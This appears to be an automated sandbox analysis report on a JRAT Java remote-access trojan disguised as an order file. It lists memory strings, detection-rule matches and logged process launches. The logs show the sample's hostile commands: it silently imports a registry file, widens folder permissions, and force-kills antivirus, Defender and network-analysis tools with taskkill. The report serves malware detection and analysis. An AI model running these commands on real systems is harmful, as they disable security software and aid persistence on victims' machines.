        Source: javaw.exe, 00000006.00000002.2851634120.000000000A1E9000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2845228924.00000000054F2000.00000004.00000800.00020000.00000000.sdmp, java.exe, 00000007.00000002.2852385683.0000000015D2C000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722951389.0000000015D25000.00000004.00000020.00020000.00000000.sdmp, java.exe, 00000007.00000003.1722357297.0000000015D15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimit
        Source: javaw.exe, javaw.exe, 00000006.00000002.2853953769.00000000156CA000.00000004.00000020.00020000.00000000.sdmp, javaw.exe, 00000006.00000003.1716826169.00000000156F9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oracle.com/xml/jaxp/properties/elementAttributeLimitK
        Source: java.exe, 00000007.00000002.2845228924.0000000005189000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://jrat.io
        Source: javaw.exe, 00000006.00000002.2845247996.0000000004C02000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://jrat.ios

        System Summary

        Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPED; Matched rule: Detects JRAT malware; Author: Florian Roth
        Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPED; Matched rule: Detects JRAT malware; Author: Florian Roth
        Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
        Source: C:\Windows\SysWOW64\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe; File created: C:\Windows\SysWOW64\test.txt
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe; Code function: 6_2_02983518
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe; Code function: 6_2_029C6D50
        Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Local\Temp\Windows6471774156078736222.dll A6BE5BE2D16A24430C795FAA7AB7CC7826ED24D6D4BC74AD33DA5C2ED0C793D0
        Source: Joe Sandbox View; Dropped File: C:\Users\user\AppData\Roaming\Oracle\bin\API-MS-Win-core-xstate-l2-1-0.dll 8594D0EDA4E4367BC3473032552C5D0F9931C283E6C4CB8D7C1E7D9F61E13506
        Source: C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class, type: DROPPED; Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
        Source: C:\Users\user\AppData\Roaming\krmyqqmohp.txt, type: DROPPED; Matched rule: MAL_JRAT_Oct18_1 date = 2018-10-11, hash1 = ce190c37a6fdb2632f4bc5ea0bb613b3fbe697d04e68e126b41910a6831d3411, author = Florian Roth, description = Detects JRAT malware, reference = Internal Research
        Source: classification engine; Classification label: mal100.phis.troj.expl.evad.winJAR@196/300@1/2
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe; File created: C:\Users\user\zbrspjjraf.js
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe; File created: C:\Users\user\AppData\Local\Temp\hsperfdata_user
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe; Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Windows\SysWOW64\taskkill.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\cmd.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\System32\conhost.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
        Source: C:\Windows\SysWOW64\wscript.exeFile read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"" >> C:\cmdlinestart.log 2>&1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Windows\SysWOW64\icacls.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Windows\SysWOW64\xcopy.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
        Source: C:\Windows\SysWOW64\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
        Source: C:\Windows\SysWOW64\taskkill.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -javaagent:"C:\Users\user\AppData\Local\Temp\jartracer.jar" -jar "C:\Users\user\Desktop\NewOrder - P2D041197.jar"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\icacls.exe C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeProcess created: C:\Windows\SysWOW64\wscript.exe wscript C:\Users\user\zbrspjjraf.js
        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe "C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe" -jar "C:\Users\user\AppData\Roaming\krmyqqmohp.txt"
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe "C:\Program Files (x86)\Java\jre-1.8\bin\java.exe" -jar C:\Users\user\AppData\Local\Temp\_0.337891030941391956323023258775833856.class
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: unknown unknown
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4614601071766058238.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive508991219844214216.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4410908985771939559.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6937263458449411198.vbs
        Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mNuEFMHNfs1412424943545557855.reg
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wsock32.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: version.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\icacls.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: jscript.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msdart.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msxml3.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
